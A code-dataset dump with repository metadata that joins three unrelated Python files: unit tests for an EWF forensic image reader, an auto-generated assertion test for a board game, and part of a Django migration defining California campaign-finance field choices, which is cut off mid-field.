] | 1 | 2021-06-20T07:18:58.000Z | 2021-09-19T12:24:03.000Z | tests/test_ewfimage.py | 3Peso/mosk | 24eccf2f2898f2508f32b52f55de30815475cddb | [
"CC0-1.0"
] | 1 | 2021-06-09T07:43:03.000Z | 2021-06-09T07:43:03.000Z | import platform
import unittest
from unittest import TestCase
from unittest.mock import patch, MagicMock
class TestEWFImageDunderInit(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__image_info(self):
"""
Should initialize member _imageInfo with EwfImageInfo object.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_image_info, actual_ewf_image._imageinfo)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__initialize_partition_lookup(self):
"""
Should call _initialize_partition_lookup
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partition_lookup', init_mock):
EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
init_mock.assert_called_once()
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__filesysteminfo(self):
"""
Should initialize member _filesysteminfo as empty dict.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_filesysteminfo: dict = {}
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_filesysteminfo, actual_ewf_image._filesysteminfo)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__fs_discovered(self):
"""
Should initialize member _fs_discoverd with False
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_fs_discovered: bool = False
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=True))
def test___init__discover_parameter_true(self):
"""
Should initialize member _fs_discoverd with True and call _initialize_partitions.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_fs_discovered: bool = True
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)
init_mock.assert_called_once()
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__discover_parameter_false(self):
"""
Should not call _initialize_partitions.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
init_mock.assert_not_called()
class TestEWFImage(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test_filesysteminfo_discover_not_set(self):
"""
Should raise an error
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
from businesslogic.errors import CollectorParameterError
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
with self.assertRaises(CollectorParameterError):
ewf_image.filesysteminfo
class TestEWFPartitionFSObjectGetter(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
def test_fs_object(self):
"""Should raise LookupError if _fs_object is none"""
from source.ewfimage import EWFPartition
partition = EWFPartition(fs_object=None, partition={})
with self.assertRaises(LookupError):
partition.fs_object
| 51.902439 | 115 | 0.727796 | 924 | 8,512 | 6.4329 | 0.095238 | 0.089502 | 0.124495 | 0.072678 | 0.85683 | 0.84926 | 0.84539 | 0.829071 | 0.829071 | 0.818809 | 0 | 0.003924 | 0.161772 | 8,512 | 163 | 116 | 52.220859 | 0.829152 | 0.054276 | 0 | 0.712963 | 0 | 0 | 0.27469 | 0.205187 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.074074 | false | 0 | 0.185185 | 0 | 0.287037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
69418f850b35b38d33f6a213b54cdf07c1d86abc | 3,675 | py | Python | z2/part3/updated_part2_batch/jm/parser_errors_2/941166032.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/941166032.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/941166032.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 941166032
"""
"""
random actions, total chaos
"""
board = gamma_new(5, 4, 2, 18)
assert board is not None
assert gamma_move(board, 1, 1, 0) == 1
assert gamma_move(board, 1, 3, 0) == 1
assert gamma_move(board, 2, 0, 0) == 1
assert gamma_move(board, 2, 1, 1) == 1
assert gamma_free_fields(board, 2) == 16
assert gamma_move(board, 1, 2, 2) == 1
assert gamma_golden_move(board, 1, 0, 0) == 1
assert gamma_move(board, 2, 4, 0) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_free_fields(board, 2) == 13
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 4, 2) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 1, 2, 1) == 1
assert gamma_golden_move(board, 1, 0, 4) == 0
assert gamma_move(board, 2, 3, 3) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_free_fields(board, 2) == 10
assert gamma_move(board, 1, 1, 3) == 1
assert gamma_move(board, 1, 2, 1) == 0
assert gamma_golden_possible(board, 1) == 0
assert gamma_move(board, 2, 3, 2) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_busy_fields(board, 2) == 6
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 1, 1, 1) == 0
assert gamma_move(board, 2, 2, 0) == 1
assert gamma_move(board, 1, 1, 0) == 0
assert gamma_move(board, 2, 3, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_free_fields(board, 1) == 7
assert gamma_move(board, 2, 3, 4) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 1, 3, 1) == 1
assert gamma_move(board, 2, 3, 4) == 0
assert gamma_move(board, 2, 2, 2) == 0
assert gamma_move(board, 1, 3, 4) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_busy_fields(board, 1) == 7
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 2, 4, 3) == 1
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_busy_fields(board, 1) == 7
board991565161 = gamma_board(board)
assert board991565161 is not None
assert board991565161 == ("21.22\n"
"..122\n"
".211.\n"
"11212\n")
del board991565161
board991565161 = None
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 1, 3, 1) == 0
assert gamma_free_fields(board, 1) == 5
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 4, 3) == 0
assert gamma_free_fields(board, 2) == 5
assert gamma_move(board, 1, 2, 1) == 0
assert gamma_free_fields(board, 1) == 5
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 1, 1, 0) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 2, 3, 2) == 0
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_busy_fields(board, 2) == 8
assert gamma_golden_possible(board, 2) == 1
assert gamma_golden_move(board, 2, 0, 1) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 2, 0, 1) == 1
assert gamma_busy_fields(board, 2) == 9
assert gamma_golden_move(board, 2, 3, 1) == 1
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 2, 4, 1) == 1
assert gamma_busy_fields(board, 2) == 11
gamma_delete(board)
| 32.522124 | 46 | 0.661224 | 676 | 3,675 | 3.426036 | 0.071006 | 0.365717 | 0.369171 | 0.492228 | 0.840674 | 0.827288 | 0.794041 | 0.678325 | 0.522021 | 0.464162 | 0 | 0.118531 | 0.185034 | 3,675 | 112 | 47 | 32.8125 | 0.654758 | 0 | 0 | 0.377551 | 0 | 0 | 0.007806 | 0 | 0 | 0 | 0 | 0 | 0.816327 | 1 | 0 | false | 0 | 0.010204 | 0 | 0.010204 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
69604e2ce469caaed8b25fe56998f8303ee6d049 | 115,459 | py | Python | calaccess_raw/migrations/0015_auto_20170729_0218.py | rkiddy/django-calaccess-raw-data | dab2bf103b713eee6d76295ffbd2d5d58c2796e4 | [
"MIT"
] | 48 | 2015-01-10T18:06:03.000Z | 2022-01-27T16:48:29.000Z | calaccess_raw/migrations/0015_auto_20170729_0218.py | rkiddy/django-calaccess-raw-data | dab2bf103b713eee6d76295ffbd2d5d58c2796e4 | [
"MIT"
] | 1,193 | 2015-01-07T06:35:20.000Z | 2021-06-19T11:43:20.000Z | calaccess_raw/migrations/0015_auto_20170729_0218.py | rkiddy/django-calaccess-raw-data | dab2bf103b713eee6d76295ffbd2d5d58c2796e4 | [
"MIT"
] | 163 | 2015-01-10T18:06:09.000Z | 2022-01-14T00:29:12.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-29 02:18
from __future__ import unicode_literals
import calaccess_raw.annotations
import calaccess_raw.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('calaccess_raw', '0014_auto_20170421_1821'),
]
operations = [
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATR', 'Assistant treasurer'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('OFF', 'Officer'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('RCP', 'Recipient committee'), ('FIL', 'Unknown'), ('PEX', 'Unknown'), ('RDP', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=32), calaccess_raw.annotations.DocumentCloud(end_page=24, id='2712033-Cal-Format-1-05-02', start_page=23), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=32)], help_text='Entity code used to identify the type of entity being described with in the record.', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F425', 'Form 425 (Semi-Annual Statement of No Activity (Recipient Committee)): Part 1, Committee Information'), ('F450', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 3, Committee Information'), ('F460', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Cover Page, Part 2'), ('F465', 'Form 465 (Supplemental Independent Expenditure Report): Part 5, Filing Officers')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=23), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=31)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('sen', 'Senate District'), ('SD', 'Assembly District'), ('se', 'Senate District'), ('F', 'Assembly District'), ('LBC', 'City'), ('CA', 'Statewide')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=24), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=33), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=35)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD'), ('s', 'SOUGHT'), ('F', 'SOUGHT'), ('T', 'HELD')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=35), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=24), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=34)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('CIT', 'State Assembly Person'), ('CTL', 'State Assembly Person'), ('F', 'State Assembly Person'), ('ST', 'State Assembly Person'), ('PAC', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION'), ('s', 'SUPPORT'), ('o', 'OPPOSITION')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=41), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=35)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='cvr2lobbydisclosurecd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('EMP', 'Employer'), ('OFF', 'Officer'), ('OWN', 'Owner'), ('PTN', 'Partner')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=57), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=71)], help_text='Entity code of the entity described by the record', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2lobbydisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=57), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=71)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvr2registrationcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('AGY', 'State Agency'), ('EMP', 'Employer'), ('FRM', 'Lobbying Firm'), ('LBY', 'Lobbyist (an individual)'), ('MBR', 'Member of Associaton'), ('SCL', 'Subcontracted Client')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=72), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=87)], help_text='Entity code of the entity described by the record', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2registrationcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=72), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=87)], help_text='Name of the source filing form or schedule', max_length=10),
),
migrations.AlterField(
model_name='cvr2socd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATH', 'Authorizing individual'), ('ATR', 'Assistant treasurer'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('OFF', 'Officer'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('SPO', 'Sponsor'), ('BMN', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=38), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=48), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=62)], help_text='Entity code of the entity described by the record.', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400 (Statement of Organization (Slate Mailer Organization)): Part 3, Individuals Who Authorize Contents Of Slate Mailers'), ('F410', 'Form 410 (Statement of Organization (Recipient Committee)): Part 4, Type of Committee')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=38), calaccess_raw.annotations.DocumentCloud(end_page=46, id='2712033-Cal-Format-1-05-02', start_page=45), calaccess_raw.annotations.DocumentCloud(end_page=59, id='2712034-Cal-Format-201', start_page=58)], help_text="Form type of the filing the record is included in. This must equal the form_type of the parent filing's cover (CVR) record.", max_length=4, verbose_name='form type'),
),
migrations.AlterField(
model_name='cvr2socd',
name='item_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATR', 'Assistant Treasurer (F410)'), ('CAO', 'Candidate/officeholder'), ('CTL', 'Controlled Committee (F410)'), ('P5B', 'Unknown'), ('PFC', 'Primarily Formed Committee Item (F410)'), ('Pfc', 'Primarily Formed Committee Item (F410)'), ('POF', 'Principal Officer (F400, F410'), ('PRO', 'Proponent'), ('SMA', 'Slate Mailer Authorizer (F400)'), ('SPO', 'Sponsored Committee Itemization (F410)'), ('n/a', 'Not Applicable'), ('CON', 'Unknown'), ('CST', 'Unknown')], db_column='ITEM_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=48), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=62)], help_text='Section of the Statement of Organization this itemization relates to. See CAL document for the definition of legal values for this column.', max_length=4, verbose_name='item code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('FED', 'N/A'), ('JR', 'N/A')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=49), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=63)], help_text='Office jurisdiction code. See CAL document for a list of legal values.', max_length=4, verbose_name='jurisdiction code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=49), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=63)], help_text='Office sought/held code. Legal values are "S" for sought and "H" for held', max_length=1, verbose_name='office is sought or held code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('Asm', 'State Assembly Person'), ('LEG', 'State Assembly Person'), ('OF', 'State Assembly Person'), ('REP', 'State Assembly Person'), ('05', 'State Assembly Person'), ('H', 'N/A'), ('PRO', 'N/A'), ('PAC', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=40), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=49), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=64)], help_text='Support or opposition code', max_length=1, verbose_name='support or opposition code'),
),
migrations.AlterField(
model_name='cvr3verificationinfocd',
name='entity_cd',
